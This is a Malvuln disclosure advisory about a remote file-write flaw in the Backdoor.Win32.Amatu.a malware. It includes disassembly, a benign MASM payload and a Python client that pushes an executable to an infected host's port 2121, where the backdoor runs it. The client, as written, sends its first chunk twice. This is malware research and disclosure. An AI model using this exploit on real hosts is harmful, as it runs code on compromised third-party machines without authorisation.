Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024 Original source: https://malvuln.com/advisory/1e2d0b90ffc23e00b743c41064bdcc6b.txt Contact: malvuln13@gmail.com Media: x.com/malvuln Threat: Backdoor.Win32.Amatu.a Vulnerability: Remote Arbitrary File Write (RCE) Family: Amatu Type: PE32 MD5: 1e2d0b90ffc23e00b743c41064bdcc6b SHA256: 77fff9931013ab4de6d4be66ca4fda47be37b6f706a7062430ee8133c7521297 Vuln ID: MVID-2024-0698 Dropped files: mine.exe Disclosure: 09/27/2024 Description: The malware listens on TCP port 2121. Third-party adversaries who can reach an infected host, can write arbitrary executable code to a file named "mine.exe" to SysWOW64 directory. The mine.exe PE file executes immediately and runs as a child of the parent process malware. Amatu calls several Win32 APIs "GetSystemDirectoryA", "CreateFileA" and "WriteFile" to save the inbound code to disk. Finally, it calls "ShellExecuteA" executing the arbitrary PE file sent by the attacker. Setup a gateway and fake DNS sinkhole to mimic outbound internet access for the C2 or the port may not open. "Amatu.a" disassembly call ds:GetSystemDirectoryA 004A1FCB lea ecx, [ebp+Source] 004A1FD1 push ecx ; Source 004A1FD2 lea edx, [ebp+Buffer] 004A1FD8 push edx ; Destination 004A1FD9 call strcat 004A1FDE add esp, 8 004A1FE1 push offset aMine ; "mine" 004A1FE6 lea eax, [ebp+Buffer] 004A1FEC push eax ; Destination 004A1FED call strcat 004A1FF2 add esp, 8 004A1FF5 push offset aExe ; ".exe" 004A1FFA lea ecx, [ebp+Buffer] 004A2000 push ecx ; Destination 004A2001 call strcat 004A2022 call ds:CreateFileA 004A206B call recv .004A2070 mov [ebp+nNumberOfBytesToWrite], eax .004A2076 cmp [ebp+nNumberOfBytesToWrite], 0 push eax ; lpNumberOfBytesWritten 004A209C mov ecx, [ebp+nNumberOfBytesToWrite] 004A20A2 push ecx ; nNumberOfBytesToWrite 004A20A3 lea edx, [ebp+buf] 004A20A9 push edx ; lpBuffer 004A20AA mov eax, [ebp+hFile] 004A20B0 push eax ; hFile 004A20B1 call ds:WriteFile mov ecx, [ebp+hFile] 004A20BF push ecx ; hObject 004A20C0 call ds:CloseHandle 004A20C6 push 1 ; nShowCmd 004A20C8 push 0 ; lpDirectory 004A20CA push 0 ; lpParameters 004A20CC lea edx, [ebp+Buffer] 004A20D2 push edx ; lpFile 004A20D3 push offset Operation ; "open" 004A20D8 push 0 ; hwnd 004A20DA call ds:ShellExecuteA 004A20E0 mov eax, [ebp+s] 004A20E3 push eax ; s 004A20E4 call closesocket Exploit/PoC: 1) Create a small PE file named "mine.exe", I used MASM and packed it with FSG. "mine.exe" include \masm32\include\masm32rt.inc .data HATE db "Masm32:", 0 MyReal8 REAL8 123.456 .data? aDword dd ? .code start: invoke MessageBox, 0, chr$("DOOM!"), addr HATE, MB_OK mov eax, 123 exit end start 2) Our custom client to send "mine.exe" to the remote infected host. from socket import * MALWARE_HOST="x.x.x.x" PORT=2121 DOOM="mine.exe" def doit(): s=socket(AF_INET, SOCK_STREAM) s.connect((MALWARE_HOST, PORT)) f = open(DOOM, "rb") EXE = f.read() s.send(EXE) while EXE: s.send(EXE) EXE=f.read() s.close() print("By Malvuln"); if __name__=="__main__": doit() Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).